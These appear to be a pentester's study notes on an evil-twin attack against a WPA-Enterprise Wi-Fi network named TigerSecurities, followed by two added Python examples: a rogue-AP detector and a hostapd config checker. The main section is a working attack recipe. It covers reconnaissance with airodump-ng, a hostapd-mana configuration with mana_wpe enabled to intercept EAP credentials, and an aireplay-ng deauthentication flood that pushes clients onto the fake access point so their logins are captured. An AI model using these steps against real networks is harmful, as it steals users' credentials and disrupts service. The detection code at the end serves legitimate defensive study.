#wpa-enterprise #wpa #mgt #wpa2 #host-apd
Useful site (VERY useful) — https://github.com/sensepost/hostapd-mana/wiki
Youtube tutorial: https://youtu.be/tLuUezovvEs
Steps:
1. Run iwconfig to discover the interfaces and their status.
2. Put an interface into monitor (listening) mode, as shown in the image below.
3. Run airodump-ng to see what is going on within the vicinity.
Note: AUTH = MGT means the network uses enterprise (802.1X/EAP) authentication rather than a pre-shared key.
4. Focus airodump-ng on channel 6 (and leave it running).
Note: we can see a STATION probing for the ESSID.
5. We now have the ESSID, so let's get to work creating a conf file for hostapd-mana.
- You only need to edit certain parts of the configuration file; the template is at: https://github.com/sensepost/hostapd-mana/wiki/Creating-PSK-or-EAP-Networks
- The basic configuration file (host.conf) is as follows:
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g
Note: we have set the interface to wlan1, as that was the interface available to us from the initial iwconfig command.
- In addition, we need to add the following to the file:
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=ca.pem
server_cert=server.pem
private_key=server.key
private_key_passwd=
dh_file=dhparam.pem
# mana_wpe=1 enables WPE mode (EAP credential interception)
mana_wpe=1
# mana_eapsuccess=1 enables EAP success messages
mana_eapsuccess=1
Note: this assumes you have all your certificates at hand. You will also need to give the full path to where the certs are kept, so edit ca_cert, server_cert, private_key and private_key_passwd accordingly.
6. We now need to create a hostapd.eap_user file, as follows:
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]
7. Now start the network: hostapd-mana host.conf
8. Switch back to airodump-ng (which should still be running) and you will see a second network.
9. Now the fun part: launch a deauth attack on the real network using aireplay-ng -0 100 -a <BSSID> wlan0
Note: you may need to add --ignore-negative-one if an error is shown.
10. Switch back to the terminal where you ran hostapd-mana with host.conf and you will see the client connect to your network, which displays the credentials.
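The second network that appears in step 8 is exactly what a defender should be watching for: a second BSSID advertising an ESSID the site already serves, on the same channel, with AUTH = MGT. The Python below is an added example, not part of these notes or of hostapd-mana. It parses constructed airodump-ng-style AP rows (placeholder MAC addresses; the column order BSSID, CH, ENC, CIPHER, AUTH, ESSID is assumed) and compares them with an inventory of authorised BSSIDs per ESSID, reporting any AP that serves a known ESSID from an unlisted BSSID.

```python
"""Rogue-AP / evil-twin check over airodump-ng style scan rows.

Added example, not from the notes or hostapd-mana. The scan table and the
inventory are constructed for illustration.
"""
from collections import defaultdict

# Constructed sample in the column order of airodump-ng's AP table
# (BSSID, CH, ENC, CIPHER, AUTH, ESSID). All MAC addresses are placeholders.
SAMPLE_SCAN = """\
BSSID              CH  ENC   CIPHER  AUTH  ESSID
00:11:22:33:44:55   6  WPA2  CCMP    MGT   TigerSecurities
AA:BB:CC:DD:EE:FF   6  WPA2  CCMP    MGT   TigerSecurities
00:11:22:33:44:66  11  WPA2  CCMP    PSK   Guest Net
"""

# Constructed inventory: the BSSIDs that legitimately serve each ESSID.
KNOWN_BSSIDS = {"TigerSecurities": {"00:11:22:33:44:55"}}


def parse_scan(text):
    """Turn the scan table into a list of dicts, skipping the header row."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 5)  # maxsplit=5 keeps ESSIDs with spaces intact
        if len(parts) < 6:
            continue
        bssid, ch, enc, cipher, auth, essid = parts
        rows.append({"bssid": bssid.upper(), "channel": int(ch), "enc": enc,
                     "cipher": cipher, "auth": auth, "essid": essid})
    return rows


def find_rogue_aps(rows, known):
    """Flag APs serving an inventoried ESSID from a BSSID not in the inventory.

    ESSIDs without an inventory entry are flagged only if more than one BSSID
    serves them, which is a weaker signal but still worth a look.
    """
    alerts = []
    by_essid = defaultdict(list)
    for row in rows:
        by_essid[row["essid"]].append(row)
    for essid, aps in by_essid.items():
        allowed = known.get(essid)
        if allowed is not None:
            for ap in aps:
                if ap["bssid"] not in allowed:
                    alerts.append({"essid": essid, "bssid": ap["bssid"],
                                   "channel": ap["channel"], "auth": ap["auth"],
                                   "reason": "BSSID not in inventory"})
        elif len({ap["bssid"] for ap in aps}) > 1:
            for ap in aps:
                alerts.append({"essid": essid, "bssid": ap["bssid"],
                               "channel": ap["channel"], "auth": ap["auth"],
                               "reason": "ESSID served by several unknown BSSIDs"})
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_aps(parse_scan(SAMPLE_SCAN), KNOWN_BSSIDS):
        print(alert)
```

Fed the sample above, the check reports the second TigerSecurities BSSID on channel 6 and nothing else; in practice the inventory would come from the WLAN controller and the rows from a wireless IDS sensor or a periodic airodump-ng CSV export rather than from an inline string.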
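The step 5 configuration is easy to get subtly wrong: a key pasted twice, or a certificate given as a relative path, which is the usual reason hostapd refuses to start. The following Python checker is an added example, not from these notes or from hostapd; it parses hostapd's key=value file format, assuming hostapd's rule that only lines beginning with '#' are comments and that a repeated key takes its last value, and reports duplicate keys, keys an EAP network needs, and path values that are not absolute. The sample config is constructed inline and deliberately contains both mistakes.

```python
"""Sanity checker for a hostapd-style key=value configuration.

Added example, not from the notes or hostapd. The config below is
constructed and intentionally repeats a key and uses relative paths.
"""
import os

SAMPLE_CONF = """\
# constructed sample config
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
eapol_key_index_workaround=0
eapol_key_index_workaround=0
ca_cert=ca.pem
server_cert=server.pem
private_key=server.key
private_key_passwd=
"""

# Keys an EAP (WPA-Enterprise) network must carry (assumed minimal set).
REQUIRED_FOR_EAP = ["ieee8021x", "eap_server", "eap_user_file",
                    "ca_cert", "server_cert", "private_key"]
# Keys whose values are file paths and should be absolute.
PATH_KEYS = ["ca_cert", "server_cert", "private_key", "dh_file", "eap_user_file"]


def parse_hostapd_conf(text):
    """Return (settings, duplicates). Only lines starting with '#' are comments."""
    settings, duplicates = {}, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" not in line:
            raise ValueError(f"line {lineno}: not key=value: {raw!r}")
        key, value = line.split("=", 1)
        key = key.strip()
        if key in settings:
            duplicates.append(key)
        settings[key] = value.strip()  # last occurrence wins
    return settings, duplicates


def check_eap_conf(text):
    """Collect human-readable problems with an EAP network configuration."""
    settings, duplicates = parse_hostapd_conf(text)
    problems = [f"duplicate key: {key}" for key in duplicates]
    if settings.get("wpa_key_mgmt") == "WPA-EAP":
        for key in REQUIRED_FOR_EAP:
            if key not in settings:
                problems.append(f"missing key required for EAP: {key}")
    for key in PATH_KEYS:
        value = settings.get(key)
        if value and not os.path.isabs(value):
            problems.append(f"{key} should be an absolute path, got {value!r}")
    return problems


if __name__ == "__main__":
    for problem in check_eap_conf(SAMPLE_CONF):
        print(problem)
```

Run against the sample it lists the repeated eapol_key_index_workaround key and the four relative file paths; an empty value such as private_key_passwd= is left alone, since it is legitimately blank for an unencrypted key.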